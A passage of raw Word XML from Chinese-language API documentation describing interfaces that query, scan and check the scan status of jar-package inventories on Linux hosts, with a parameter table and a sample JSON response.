          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFB39E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E97A89" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460E99FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>jar包信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39362593" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>jar包信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4C47C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>jar包信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2269784E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4338FD03" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用jar包信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4F2A29" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>获取更新数据则先调用2号接口进行更新再调用3号接口查看是否更新完成，最后再调用1号接口查询最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04117171" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C39A9FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="jar包信息查询结果"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>jar包信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3AE949" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于查询jar包信息，按每台主机每个jar包进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E146CF6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A4F23B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/assets/jar_pkg/linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EDAB9B"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262"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="6818"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="6805167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2DD41E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D365101" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77CE402B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E80A34A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="60313A88" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="263C93A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CF82F46" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="583A7B93" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56A3AD03" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7E54B99C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B9F6991" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DA1CAAD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12E91103" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="123E627B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3B456025" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="136186F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F837DC9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="127D4983" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B79D09F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4B12643A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F8632FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A5F4C63" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05022D3D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F8E2446" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3C895EAE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B9BD3E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="441CD554" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2130C8E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67979058" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>包名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1EADEE58" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D020376" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="514BC64B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="630311F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07D5586C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6749910F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="119D67E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EA80320" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E8CC647" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="299F81F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型 （1：应用程序，2：系统类库，3:web服务自带库，8：其他依赖包）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="55901C13" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C4ECC5C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>executable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4602AC14" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>布尔数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F90601E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10C44B79" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否可执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4DF10C4C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1491EACF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CE9BBE0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DD94E73" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44A375F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>绝对路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3371A6B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A156B8F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/jar_pkg/linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CC25D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD386BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "fe107d9c77f4c77a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "displayIp": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp": "172.16.2.244",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId": 41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup": "业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "12345",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签a"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "xdu-vm-cent51",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "name": "rt.jar",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "path": "/opt/IBM/WebSphere/AppServer/java/jre/lib/rt.jar",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "executable": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "version": "1.8.0",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "type": 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E4C2E6"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452"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="1250"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="306B9DA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815BAE8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74B04FD0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AF2D061" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4030EFC8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="47EDFE67" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B8AF864" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D67D213" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62F2C9CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17342EA4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agent uuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5F3A3748" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1045916F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57E904E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="216DC087" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A7FADC6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4860A1B0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5767A164" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DA76A2C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AA0E297" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69219511" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="38CCEE67" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E27C816" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1733C418" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37F686DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
